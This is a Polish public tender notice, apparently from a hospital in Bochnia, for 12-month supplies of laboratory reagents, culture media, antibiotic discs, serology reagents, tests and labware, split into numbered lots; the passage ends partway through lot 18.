<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2013 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31 na Dzienniku podawczym - sekretariat pok. nr 3, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Odczynniki do immunochemii wraz z dzierżawą  analizatora immunochemiczngo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń na okres 12 m-cy  
1.	TSH	6600
2.	FT3	1380
3.	FT4	1740
4.	FSH	540
5.	Progesteron	720
6.	CKMB masa	180
7.	CA 125	840
8.	TPSA	780
9.	Estradiol	600
10.	D-DIMERY	720
11.	Prokalcytonina	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Odczynniki, akcesoria i części zużywalne z zakresu chemii klinicznej do posiadanego analizatora biochemicznego KONELAB 20 ISE wraz z dzierżawą zastępczego analizatora biochemicznego kompatybilnego z posiadanym (pracującego w tym samym systemie odczynnikowym).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń na okres 12 m-cy  
1.	Wapń 	1800
2.	Żelazo 	5625
3.	TIBC	150
4.	Magnez Mg-Kit 	3600
5.	Bilirubina całkowita TOT.MET.NBD.	4500
6.	Cholesterol 	8400
7.	HDL cholesterol Direct 	4500
8.	Glukoza 	23500
9.	Trójglicerydy	7000
10.	Mocznik 	10000
11.	Kwas moczowy	4000
12.	Bilirubina Direct Bezp.	2000
13.	Białko całkowite 	2000
14.	Białko w PMR i moczu 	1800
15.	Kreatynina	20000
16.	Fosfataza zasadowa IFCC 	2400
17.	Amylaza 	2400
18.	GGTP 	3500
19.	AspAT IFCC 	7700
20.	AIAT IFCC	7000
21.	CRP	12960
22.	Alkohol etylowy 	1600
23.	Kreatynina enzymatyczna l	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Krążki antybiotykowe i diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Ampicylina     AM  10 ug	szt.	960
2.	Ampicylina     AM  2 ug	szt.	250
3.	Ampicylina/sulbactam   SAM  10/10 ug	szt.	100
4.	Amoksycylina/kwas klawulanowy AMC 20/10	szt.	1100
5.	Amikacyna  AN  30	szt.	900
6.	Aztreonam   ATM  30	szt.	100
7.	Azytromycyna  AZM  15	szt.	50
8.	Cefuroksym   CXM  30	szt.	950
9.	Cefaklor    CEC  30	szt.	100
10.	Cefoksytyna  FOX  30	szt.	700
11.	Ceftazydyna  CAZ  30	szt.	300
12.	Cefazolina 30	szt.	50
13.	Cefoperazon   CFP  30	szt.	100
14.	Cefotaksym    CTX  30	szt.	250
15.	Ceftriakson   CRO 30	szt.	100
16.	Cefaleksyna    CL  30	szt.	450
17.	Cefepim  FEP  30	szt.	450
18.	Ceftarolina   5	szt.	100
19.	Ciporofloksacyna   CIP 5	szt.	1300
20.	Chloramfenikol   C  30	szt.	150
21.	Chinupristyna /dalfopristyna   SYN	szt.	250
22.	Doksycyklina D 30	szt.	50
23.	Erytromycyna  E  15	szt.	850
24.	Gentamycyna    Ge 10	szt.	1100
25.	Imipenem    IPM 10	szt.	850
26.	Klarytromycyna   CLR 15	szt.	50
27.	Kwas Nalidyksowy   NA  30	szt.	150
28.	Doripenem 10	szt.	50
29.	Klindamycyna  CC 2	szt.	850
30.	Mupirocyna     MUP  200	szt.	150
31.	Norfloksacyna   NOR  10	szt.	350
32.	Oxacylina  OX  1	szt.	150
33.	Kloksacylina	szt.	50
34.	Ofloksacyna   OFX 5	szt.	150
35.	Penicylina P  10 IU	szt.	50
36.	Streptomycyna  S 300	szt.	150
37.	Trimetoprim   TMP 5	szt.	250
38.	Trimetoprim/Sulfamethoksazol   SXT	szt.	1300
39.	Tetracyklina   TE   30	szt.	700
40.	Teikoplanina   TEC   30	szt.	150
41.	Tobramycyna  NN  10	szt.	800
42.	Tikarcylina TIC 75	szt.	150
43.	Tikarcylina/kw.klawulanowy   TIM 75/10	szt.	150
44.	Temocylina  30 	szt.	150
45.	Amoksycylina/kwas klawulanowy   AMC 2/1	szt.	250
46.	Moksifloksacyna   MFX 5	szt.	250
47.	Meropenem MEM  10	szt.	750
48.	Ertapenem ETP 10	szt.	400
49.	Lewofloksacyna   LVX 5	szt.	600
50.	Rifampicyna  RF 5	szt.	100
51.	Fosfomycyna trometamol FOT 200	szt.	250
52.	Tigecyklina   TGC 15 ug	szt.	100
53.	Krążki z optochiną	szt.	450
54.	Krążki z czynnikiem X	szt.	250
55.	Krążki z czynnikiem V	szt.	250
56.	Krazki z Bacytracyną  do identyfikacji Strep. pyogenes	szt.	100
57.	Krążki do ident. Moraxella catarrhalis	szt.	100
58.	Krazki z Nowobiocyną	szt.	50
59.	Krążki z Furazolidonem	szt.	50
60.	Test cefinazowy  w krążkach	szt.	150
61.	Krążki do identyfikacji Enterococcus faecalis	szt.	100
62.	Test na oxydazę  /krążki lub paski /	szt.	250
63.	Krązki do identyfikacji Gardnerella vaginalis	szt.	100
64.	Kwas Fusydowy 10 ?g	szt.	300
65.	Kanamycyna 30 ?g	szt.	300
66.	Piperacylina 30	szt.	100
67.	Piperacylina/Tazobactam 30/6	szt.	150
68.	Cefotaksym 5	szt.	550
69.	Ceftazydym 10	szt.	650
70.	Netilmycyna 10	szt.	1000
71.	Nitrofurantina 100	szt.	450
72.	Penicylina Benzylowa (Penicylina G) 1UI	szt.	450
73.	Linezolid 10	szt.	350
74.	Gentamicyna 30	szt.	150
75.	Wankomycyna 5	szt.	150
76.	Fenoksymetylpenicylina (Penicylina V) 10	szt.	50
77.	Minocyklina 30	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Płytki gotowe, testy lateksowe, odczynniki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Columbia Agar+ 5% krew barania	szt.	4100
2.	Columbia Agar+5% krew   CNA  wybiórcze dla  Staph/ Strept	szt.	150
3.	Mueller Hinton 2 Agar	szt.	3400
4.	Saboraud Agar + Gentamicyna + Chloramfenikol	szt.	500
5.	Agar wybiórczy dla Enterococcus z  eskuliną	szt.	300
6.	Agar MacConkey z fioletem krystalicznym	szt.	540
7.	Agar wybiórczy z dla Pseudomonas z cetrimidem	szt.	70
8.	Agar czekoladowy wybiórczy dla Haemophilus z  bacytracyną	szt.	360
9.	Agar czekoladowy z antybiotykiem dla Neisseria meningitidis i Neisseria gonorrhoeae	szt.	20
10.	Agar selektywny dla Gardnerella vaginalis	szt.	350
11.	Agar Schaedlera + 5% krew barania 	szt.	400
12.	Agar Schaedlera + 5% krew barania z antybiotykami Neomycyną i Vankomycyną	szt.	400
13.	Agar selektywny dla dermatofitów	szt.	20
14.	Agar selektywny dla Salmonella/Shigella	szt.	10
15.	Bulion TSB w probówkach	szt.	300
16.	Bulion Schaedlera z vit K w probówkach	szt.	20
17.	Liofilizowane podłoże do hodowli Trichomonas vaginalis	szt.	24
18.	Szybki test lateksowy do wykrywania grypy serolog A u paciork.( 50 oznaczeń)	op.	1
19.	Szybki test lateksowy do wykrywania grupy serolog B u paciork (50 oznaczeń)	op.	1
20.	Szybki test lateksowy do wykrywania grupy serolog C u paciork. (50 oznaczeń)	op.	1
21.	Szybki test lateksowy do idententyfikacjiantyg. Bakteryjnych w PMR  (nie więcej niż 30 oznacz.)	op.	1
22.	Test lateksowy suchy-lateks opłaszczony na kartonie reakcyjnym do identyfikacji Staphylococcus aureus (wykrywający koagulazę,białko A, polisacharydy MRSA)	oznaczeń	240
23.	Płytki odciskowe do mikrobiologicznej czystości powierzchni płaskich i powietrza  /25 cm2 powierzchni/	szt.	40
24.	Podłoże płynne namnażajace w butelkach do hodowli drobnoustrojow z krwi w war. tlenowych i beztlenowych z indykatorem wzrostu  /metoda manualna/	szt.	420
25.	Agar Mueller Hinton z 5 % krwią końska 20 mg/l NAD	szt. 	530
26.	Probówki z tioglikolanem sodu poj. 9 ml (do hodowli płynnej bakterii beztlenowych)	szt.	50
27.	Brucella Agar plus 5% krew końska	szt	30
28.	Bulion Tood Hewitta z antybiotykiem w probówkach 5ml  	szt	120
29.	Dezoksycholan sodu  ampułki 2ml	szt.	3
30.	Roztwór EDTA  pH 7,3-7,4   0,5 Mol poj.2ml	szt.	3
31.	Kwas boronowy 300?g,poj 2ml	szt.	3
32.	Odczynniki do wykrywania katalazy (nie więcej niż 5 ml)	op.	1
33.	gotowe podłoze w probówkach do oznaczania ruchliwości drobnoustrojów	szt	20
34.	Zestaw odczynników do barwienia Gramem (4x 240 ml)	op.	8
35.	osocze królicze liofilizowane (nie więcej niż 5ml)	op.	5
36.	generator CO 2 (saszetki)	szt	280
37.	generator anaer z katalizatorem (saszetki)	szt	280
38.	genbag anaer + saszetki	szt	40
39.	Anaer indykator    	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Płytki gotowe chromogenne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Agar MRSA  z Cefoksytyną	szt.	240
2.	Agar do identyfikacji Staphylococcus  aureus	szt.	320
3.	Agar do identyfikacji  Streptococcus agalactiae gr B	szt.	510
4.	Agar do izolacji drobnoustrojów z moczu	szt.	820
5.	Agar do wstępnej identyfikacji grzybów z  rodzaju Candida  / 4 gatunki/	szt.	80
6.	Agar do wykrywania pałeczek G ujemnych  z mechanizmem KPC	szt.	50
7.	Agar do wykrywania pałeczek G ujemnych  z mechanizmem ESBL	szt.	240
8.	Agar Saboraud/ agar  do identyfikacji Candida płytki dzielone	szt.	40
9.	Agar do identyfikacji Clostridium difficile	szt.	20
10.	Agar do wykrywania Enterococcus VRE	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Testy paskowe do idetyfikacji drobnoustrojów  wraz z dzierżawą czytnika z wyposażeniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	zestaw bezodczynnikowy do identyfikacji szczepów bakterii jelitowych z rodz. Enterobacteriacae za pomoca 24 cech biochemicznych stanowiacych 1 panel diagnostyczny w czasie 24 godz.	szt.	400
2.	zestaw do identyfikacji szczepów bakterii jelitowych z rodz. Enterobacteriacae w oparciu o 24 cechy biochemiczne stanowiace 1 panel diagnostyczny w czasie do 5 godz.	szt.	100
3.	zestaw bezodczynnikowy do identyfikacji paciorkowców za pomoca 24 cech biochemicznych stanowiacych 1 panel diagnostyczny w czasie 24 godz.	szt.	80
4.	nośnik zawiesiny do identyfikacji paciorkowców (w niezbędnej ilości do wykonania w/w testów)	szt.	80
5.	zestaw bezodczynnikowy do identyfikacji gronkowców za pomoca 24 cech biochemicznych stanowiacych 1 panel diagnostyczny w czasie 24 godz.	szt.	80
6.	zestaw bezodczynnikowy do identyfikacji bakterii niefermentujacych za pomoca 24 cech biochemicznych stanowiacy 1 panel diagnostyczny w czasie 24 godz.	szt.	40
7.	zestaw bezodczynnikowy do identyfikacji grzybów drozdzopodobnych za pomoca 21 cech biochemicznych stanowiących 1 panel diagnostyczny	szt	40
8.	zestaw bezodczynnikowy do identyfikacji bakterii z rodziny Neisseria za pomoca 7 cech biochemicznych stanowiących 1 panel diagnostyczny w czasie do 24 godz.	szt	30
9.	nośnik zawiesiny  do identyfikacji bakterii z bakterii z rodziny Neisseria (w niezbędnej ilości do wykonania w/w testów0	szt	30
10.	zestaw do identyfikacji bakterii beztlenowych za pomocą 23 cech biochemicznych stanowiących 1 panel diagnostyczny w czasie 24 godz- 48 godz.	szt	40
11.	nośnik zawiesiny do identyfikacji bakterii beztlenowych ( w niezbędnej ilości do wykonania w/w testów)	szt	40
12.	Szybki test paskowy do wykrywania zdolności szczepów bakteryjnych do hydrolizy hipuranu sodu wraz z odczynnikiem	szt.	50
13.	Test do szybkiej detekcji produkcji acetoiny wraz z odzcynnikiem	szt	50
14.	szybki test paskowy do wykrywania aktywności bakteryjnej betalaktamazy dla organizmów rodzaju Staphylococcus, Neisseria, Haemophilus	szt	50
15.	Test do szybkiego wykrywania aktywności esterazy octanowej bakterii Moraxella catarrhalis	szt	50
16.	Szybki test paskowy do testu PYR wraz z odczynnikiem	szt	50
17.	odczynnik do testu indol	szt	200
18.	odczynnik do testu Fenyloalanina	szt	200
19.	odczynnik do testu Fosfataza	szt	200
20.	Odczynnik do testu Azotany	szt	200
21.	Szybki test przeznaczony do oznaczania reaklcji indolowej jako degradacyjnego produktu bakteryjnego metabolizmu tryptofanu	szt	400
22.	olej parafinowy	op	3
23.	końcówki do pipety automatycznej	szt	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Szczepy wzorcowe z kolekcji amerykańskiej ATCC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Staphylococcus  aureus ATCC 29213	szt.	1
2.	Enterococcus faecalis  ATCC 29212	szt.	1
3.	Streptococcus pneumoniae  ATCC 49619	szt.	2
4.	Escherichia  coli  ATCC 25922	szt.	1
5.	Haemophilus  influenzae NCTC 8468 	szt.	2
6.	Pseudomonas aeruginosa  ATCC 27853	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr  8 - System paskowy do ilościowego określania  MIC na paskach plastikowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	antybiotyki z gradientem stężeń na pasku plastikowym do określania MIC danego antybiotyku (Penicylina benzylowa PG 256, Amoksycylina/kw.klaw 256, Amikacyna     256, Gentamicyna 1024, Netylmicyna 256, Kolistyna 256, Klindamycyna   256, Tetracyklina 256, Erytromycyna 256, Vankomycyna  256, Teikoplanina 256, Cefotaksym 256, Ceftazydyna 256, Ceftriakson 256, Imipenem 32, Meropenem 32, Ciprofloksacyna  32, Ampicylina/sulbaktam 256	szt.	240
	Chloramfenikol 256, Piperacylina/tazobaktam 256, Cefuroksym 256, Ampicylina 256, Cefotaksym  CT 32, Cefepim 256, Ertapenem 32, Gentamicyna  256, Mertonidazol 256, Tigecyklina 256, Trimethoprim/Sulfamethoksazol 32, Piperacylina 256, Ticarcylina/kw.klawulanowy 256, Cefoksytyna 256		
2.	testy antybiotykowe na nośniku plastikowym do wykrywania mechanizmów oporności  MBL, ESBL,AmpC,GRD	szt.	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9-Odczynniki serologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Odczynnik monoklonalny anty A klon I - fiolka 10 ml z zakraplaczem	amp.	30
2.	Odczynnik monoklonalny anty A klon II - fiolka 10 ml z zakraplaczem	amp.	50
3.	Odczynnik monoklonalny anty B klon I - 10 ml fiolka z zakraplaczem	amp.	30
4.	Odczynnik monoklonalny anty B klon II - fiolka 10 ml  z zakraplaczem	amp.	50
5.	Odczynnik monoklonalny anty D Blend - fiolka 10 ml z zakraplaczem	amp.	67
6.	Odczynnik monoklonalny anty D RUM - fiolka 10 ml z zakraplaczem	amp.	85
7.	Odczynnik monoklonalny antyglobulinowy poliwalentny płynny - fiolka 10 ml z zakraplaczem (tylko odczynnik - nie może być surowica)	amp.	260
8.	Standard anty D - 2ml	amp.	220
9.	LISS - L (płynny) - 100ml	szt.	180
10.	Krwinki wzorcowe do wykrywania przeciwciał - 3 x 10 ml - fiolka z zakraplaczem	zest.	75
11.	Dolichotest  5ml	amp.	1
12.	Krwinki słabouczulone - 10 ml fiolka z zakraplaczem	amp.	43
13.	Odczynnik monoklonalny anty-IgG - amp. 10 ml z zakraplaczem.	amp.	2
14.	Odczynnik monoklonalny anty-C - amp. 5 ml z zakraplaczem	amp.	1
15.	Odczynnik monoklonalny anty-Cw - amp. 5 ml z zakraplaczem	amp.	1
16.	Odczynnik monoklonalny anty-c- - amp. 5 ml z zakraplaczem	amp.	1
17.	Odczynnik monoklonalny anty-E - amp. 5 ml z zakraplaczem	amp.	1
18.	Odczynnik monoklinalny anty-e- - amp. 5 ml z zakraplaczem	amp.	1
19.	Odczynnik monoklonalny anty-K - amp. 5 ml z zakraplaczem	amp.	2
20.	PEG (glikol poliwalentny) - amp. 10 ml z zakraplaczem	amp.	3
21.	PBS 500 ml	szt.	2
22.	Zestaw krwinek wzorcowych do badań układu AB0 3x10 ml z zakraplaczem	zestaw	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10 - Testy  immunochromatograficzne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Test immunochromatograficzny kasetkowy do wykrywania antygenu Rota  i Adenowirusa w kale (pakowany pojedynczo)                 	szt.	125
2	Test do oznaczania wyłącznie lekowrażliwosci dla grzybów metoda manualną musi zawierać zestaw Następujących antybiotyków p/ grzybiczych :  5 Fluorocytozyna, Amfoteryczna B, Mikonazol, ketokonazol, Itrakonazol, Flukonazol.  Musi zawierać kontrolę pozytywną i negatywną. Oraz zestaw dodatkowych odczynników potrzebnych do wykonania testu. Każde opakowanie powinno zawierać nie więcej jak 10 testów.                 	szt.	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 - Odczynniki laboratoryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość j.m.
1.	Odczynnik Rossiniego 100 ml	ml	300
2.	Mac-William 1000 ml	ml	18000
3.	May-Grunwald 1000 ml	ml	5000
4.	Barwnik Giemsy 1000 ml	ml	2000
5.	Odczynnik Ehrlicha 1000 ml	ml	3000
6.	Odczynnik TURKA 100 ml.	ml	100
7.	Odczynnik PANDego 100 ml	ml	200
8.	Odczynnik Samsona 100 ml	ml	100
9.	Odczynnik NONE-APELTA 100 ml.	ml	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 - Testy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń na okres 12 m-cy  
1.	RPR do oznaczania OWA 	1 700
2.	Paski do moczu 7 parametrowe 	100
3.	HCGP - test ciążowy - kaseta (czułość 10 n/ml) 	800
4.	Test do wykrywania krwi w kale (bez diety) - kaseta (czułość 10 ng/ml) 	160
5.	ASO - latex bez kontroli 	300
6.	ASO - latex z kontrolą 	100
7.	CRP latex z kontrolą 	100
9.	LATEX R  z kontrolą	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13 - Odczynniki do aparatu CHROM 3003.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń na okres 12 m-cy  
1.	APTT 	900
2.	Calcium chloride 	900
3.	PTT	1600
4.	Fibrynogen	320
5.	Bufor imidazolowy	320
Kontrola Koagulogiczna N 
Kontrola Koagulogiczna P.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14 - Odczynniki i materiały zużywalne do analizatorów parametrów krytycznych ABL 835-FLEX wraz z dzierżawą aparatu  kompatybilnego z posiadanym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Odczynniki i materiały zużywalne, niezbędne do wykonania 4000 oznaczeń w ciągu 12 miesięcy. 		
			
			
			
			
			
			
			
			
			
			
			
			
			
2.	Materiał kontrolny - 4 poziomy. Kontrola będzie wykonywana codziennie na 1 z 4 dostępnych poziomów.		
			
			
			
3.	Kapilary zbalansowane elektrolitowo +zatyczki+sztyfciki 1x75x35 op 100szt.	op.	10
4.	Wyłapywacze skrzepów	op.	20
Odczynniki i materiały zużywalne do analizatora parametrów krytycznych NPT 7										
Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Odczynniki i materiały zużywalne, niezbędne do wykonania oznaczeń: pH, pCo2, pO2 (30 testów); pH, pCo2, pO3 i pełna oksymetria  (30 testów)		
			
			
2.	Materiał kontrolny - 2 poziomy.		
			
3.	 Papier do drukarki	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15- Odczynniki do aparatu Sysmex KX-21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Cellpack (20 l)	op.	20
2.	Stromatolyser WH 1,5 L (3 x 0,5 l)	op.	8
3.	Cellclean 1 x 50 ml	op.	3
4.	Krew kontrolna  mianowana 8-check 18 parametrowa  4,6 ml N 	op.	4
5.	Krew kontrolna  do międzynarodowej kontroli producenta aparatu - IQAS 1,5 ml	op.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16 - Odczynniki do aparatu Labu-Reader.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Testy paskowe do moczu LABStrip U11 op. - 150 szt.	op.	160
2.	Mocz kontrolny LEVEL 1, LEVEL 2	op.	3
3.	Gumowe paski do aparatu Labu-Reader kompl. 2 szt.	kompl	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17 - Papier do aparatów laboratoryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Papier termoczuły 57mm 	szt.	24
2	Papier  termoczuły  - 110mm	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18 - Laboratoryjny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	Jednorazowe,  przeźroczyste  płyty do oznaczania grup krwi z 7 wgłębieniami (op. A100 szt.)	op.	15
2.	Korek do probówek 12mm polietylenowy, karbowany	szt.	300
3.	Końcówki do pipet na 1000ul  op.1000 szt.(typu Gilson)	op.	12
4.	Końcówki do pipet na 5000?l op.250szt	op.	6
5.	Końcówki do pipet na 200ul  op. 1.000 szt.(typu Gilsona)	op.	57
6.	Naczyńka do analizatora Cobas Mira poj. 0,7 ml  - op. 1.000 szt.	op.	2
7.	Probówki do aparatu CHROM 3003 op. 500 szt.	op.	39
8.	Probówki do barwienia i zliczania relikulocytów na   100ul krwi wersenianowej zawierajace 100ul błekitu brylantowo-kuzolowego	szt.	120
9.	Probówki szklane z dnem stożkowym poj10 ml	szt.	1000
10.	Wymazówki transportowe z aplikatorem plastikowym z podłozem Amies z węglem	szt.	1000
11.	zestaw jednorazowy do OB.(probówka na 1ml plus pipeta. )	szt.	5000
12.	Probówki z tworzywa sztucznego o poj. 11 ml.(16x100) przeźroczyste	szt.	500
13.	Bagietka laboratoryjna o dł.  120 mm, śr. ok. 4 mm  z polistyrenu	szt.	100
